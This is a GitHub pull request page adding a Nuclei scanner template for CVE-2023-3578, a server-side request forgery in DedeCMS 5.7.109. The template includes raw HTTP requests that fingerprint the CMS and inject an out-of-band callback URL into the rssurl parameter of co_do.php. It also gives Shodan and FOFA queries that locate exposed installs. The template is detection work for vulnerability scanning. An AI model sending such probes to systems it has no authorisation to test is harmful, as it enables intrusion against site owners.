Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Create CVE-2023-3578.yaml #10817

Merged
merged 2 commits into from
Sep 23, 2024
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
58 changes: 58 additions & 0 deletions http/cves/2023/CVE-2023-3578.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,58 @@
id: CVE-2023-3578

info:
name: DedeCMS 5.7.109 - Server-Side Request Forgery
author: ritikchaddha
severity: critical
description: |
Manipulation of the rssurl parameter in co_do.php leads to server-side request forgery in DedeCMS version 5.7.109.
impact: |
Successful exploitation could lead to sensitive data exposure, server-side request forgery, and potential server compromise.
remediation: |
Apply the vendor-supplied patch or update to a non-vulnerable version of DedeCMS.
reference:
- https://github.com/nightcloudos/cve/blob/main/SSRF.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-3578
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-3578
cwe-id: CWE-918
epss-score: 0.00063
epss-percentile: 0.26288
cpe: cpe:2.3:a:dedecms:dedecms:5.7.109:*:*:*:*:*:*:*
metadata:
vendor: dedecms
product: dedecms
shodan-query: http.html:"DedeCms"
fofa-query: app="DedeCMS"
tags: cve,cve2023,dedecms,ssrf,oast

flow: http(1) && http(2)

http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: response
words:
- "DedeCms"
case-insensitive: true

- raw:
- |
GET /co_do.php?rssurl=https://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- "http"
Loading